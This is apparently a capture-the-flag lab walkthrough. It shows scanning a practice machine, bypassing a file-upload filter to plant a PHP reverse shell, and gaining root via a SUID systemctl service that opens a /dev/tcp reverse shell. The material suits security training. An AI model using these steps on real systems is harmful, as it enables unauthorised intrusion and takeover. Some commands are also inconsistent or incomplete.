

Start by scanning the machine with nmap

nmap -sV -A --script vuln

We see that the Apache server is running on port 3333

So we scan this server

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

We discover a subfolder /internal/ that lets you upload files using a form.

The only problem is that this form doesn't allow any type of file.

We'll use BurpSuite to find the authorized file(s).

Once BurpSuite has been set up correctly, we intercept the request and send a random file.

Then we use Sniper and add a payload at the filename extension filename="name.txt". Just before the '.' and just after the end of the extension.


As suggested in the task 4 of the room, we create a wordlist with some extensions. We add these extensions as payloads in BurpSuite and then we can start the Attack.


Once the attack has been carried out, a window shows status 200 for each extension tested, as the request was successful. We therefore need to find out when the error message is not sent (the size of the response will be different).

We find that the extension that works is .phtml.

We'll use a reverse-shell already present in kali /usr/share/webshells/php/php-reverse-shell.php and rename it to shell.phtml (don't forget to change IP and port variables).

This file can now be uploaded to the server. But before Submit, in a terminal, enter the following command:

nc -lvnp [PORT]


There's a bill user, and in his /home, we can retrieve one of the expected flags.

Next, we need to find a way to gain better privileges. We look for files with the SUID included for the root user.

find / -type f -user root -perm 6000 2> /dev/null

We can see that /bin/systemctl is usable. Let's try to play with it. We can't use a text editor. So we're using the echo command to write in a file:

touch /tmp/root.service
echo "
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'
" >> /tmp/root.service

We now need to listen on our port 4444.

nc -lvnp 4444

Go back to the machine you're running and start the service.

/bin/systemctl enable /tmp/root/service
/bin/systemctl start root

So we get a shell (with the root user) on the machine and have access to everything we want.

cat /root/root.txt